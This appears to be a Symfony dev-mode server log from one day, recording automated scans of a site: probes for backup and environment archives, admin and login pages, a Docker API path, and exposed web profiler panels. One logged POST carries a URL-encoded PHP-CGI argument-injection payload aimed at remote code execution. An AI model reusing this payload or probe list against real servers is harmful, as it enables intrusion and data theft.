[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /department.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /department.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /documentation.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /documentation.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sentry.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sentry.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:51:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:51:40] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?%ADd%20allow_url_include%3D1%20%ADd%20auto_prepend_file%3Dphp%3A%2F%2Finput","method":"POST"} []
[2025-12-18 07:53:13] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 07:54:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /containers/json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /containers/json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:03:19] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 08:03:21] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 08:03:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/" (from "http://web.unda.co/wp-admin/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/\" (from \"http://web.unda.co/wp-admin/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:03:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administrator/" (from "http://web.unda.co/administrator/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administrator/\" (from \"http://web.unda.co/administrator/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:03:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /user/login" (from "http://web.unda.co/user/login")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /user/login\" (from \"http://web.unda.co/user/login\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:03:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin" (from "http://web.unda.co/admin")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin\" (from \"http://web.unda.co/admin\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:03:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login" (from "http://web.unda.co/login")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login\" (from \"http://web.unda.co/login\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:03:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /register" (from "http://web.unda.co/register")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /register\" (from \"http://web.unda.co/register\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:03:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin" (from "http://web.unda.co/admin")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin\" (from \"http://web.unda.co/admin\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:03:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login" (from "http://web.unda.co/login")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login\" (from \"http://web.unda.co/login\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:05:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e252a6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e252a6?panel=dump","method":"GET"} []
[2025-12-18 08:05:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-18 08:09:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=config","method":"GET"} []
[2025-12-18 08:09:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 08:11:26] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 08:16:08] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"408a13","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/408a13/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-18 08:16:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-18 08:20:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ee3c72","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ee3c72?panel=twig","method":"GET"} []
[2025-12-18 08:20:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 08:24:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b9b204","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b9b204?panel=validator","method":"GET"} []
[2025-12-18 08:24:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-18 08:25:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"83a376","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/83a376?panel=validator","method":"GET"} []
[2025-12-18 08:25:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-18 08:25:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:27:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"206850","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/206850","method":"GET"} []
[2025-12-18 08:27:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 08:31:42] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 08:34:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=events","method":"GET"} []
[2025-12-18 08:34:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-18 08:43:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:49:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:49:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:49:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:49:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:49:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:49:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:49:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:49:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:49:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 08:50:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=time","method":"GET"} []
[2025-12-18 08:50:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 09:00:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 09:02:28] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 09:04:29] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"132e26","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/132e26/search/results?ip=78.153.140.179&limit=10&method=GET","method":"GET"} []
[2025-12-18 09:04:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=78.153.140.179&limit=10&method=GET","method":"GET"} []
[2025-12-18 09:06:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"27f092","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/27f092?panel=form","method":"GET"} []
[2025-12-18 09:06:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-18 09:12:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:36] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-18 09:13:36] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-18 09:13:36] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 09:13:36] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 09:13:36] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-18 09:13:36] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-18 09:13:36] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-18 09:13:37] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-18 09:13:37] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-18 09:13:37] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 09:13:37] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 09:13:37] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-18 09:13:37] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-18 09:13:37] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-18 09:13:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
